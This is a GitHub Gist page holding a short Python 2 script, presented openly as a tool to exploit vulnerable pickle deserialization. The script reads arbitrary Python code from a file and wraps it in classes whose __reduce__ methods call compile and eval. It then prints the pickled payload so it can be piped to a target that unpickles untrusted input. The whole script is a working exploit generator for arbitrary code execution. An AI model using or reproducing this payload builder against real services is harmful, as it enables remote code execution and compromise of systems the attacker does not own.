Last active
August 15, 2018 15:04
-
-
Save Foo-Manroot/f70ef2d26f91756b4669af2d2f8d683c to your computer and use it in GitHub Desktop.
Script to serialize arbitrary Python code and exploit a vulnerable pickle deserialization
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# -*- coding: utf-8 -*- | |
__author__ = "Foo-Manroot" | |
__license__ = "GPL" | |
__version__ = "1.0" | |
""" | |
Little script to serualize with pickle a custom code to exploit a vulnerable target. | |
Copyright © 2018 Foo-Manroot | |
This program is free software: you can redistribute it and/or modify | |
it under the terms of the GNU General Public License as published by | |
the Free Software Foundation, either version 3 of the License, or | |
(at your option) any later version. | |
This program is distributed in the hope that it will be useful, | |
but WITHOUT ANY WARRANTY; without even the implied warranty of | |
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
GNU General Public License for more details. | |
You should have received a copy of the GNU General Public License | |
along with this program. If not, see <http://www.gnu.org/licenses/>. | |
""" | |
import sys | |
import cPickle as pickle | |
class Compiler (object): | |
""" | |
Additional class to compile the provided code, as pickle can't serialize | |
code objects | |
""" | |
def __init__ (self, code): | |
self.code = code | |
def __reduce__ (self): | |
return ( compile, (self.code, '<string>', 'exec') ) | |
class Exploit (object): | |
""" | |
Main class to evaluate code at unserialization | |
""" | |
def __init__ (self, code): | |
self.code = code | |
def __reduce__ (self): | |
return ( eval, (Compiler (self.code), ) ) | |
if __name__ == "__main__": | |
if (len (sys.argv) <= 1 | |
or | |
sys.argv [1].lower () == "-h" | |
or | |
sys.argv [1].lower () == "--help" | |
): | |
print ("Script to serialize with pickle a code to exploit a vulnerable target") | |
print ("Foo-Manroot - 2018\n") | |
print ("Usage:") | |
print (sys.argv [0] + " [-h | --help | FILE]\n") | |
print ("The available options are:") | |
print ("\tFILE") | |
print ("\t\tA file with the Python source code to be serialized") | |
print ("\t-h") | |
print ("\t--help") | |
print ("\t\tShows this help message") | |
exit (1) | |
code = open (sys.argv [1], "r").read () | |
# This is the only thing being printed, so it can be piped for the exploitation | |
print (pickle.dumps (Exploit (code))) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment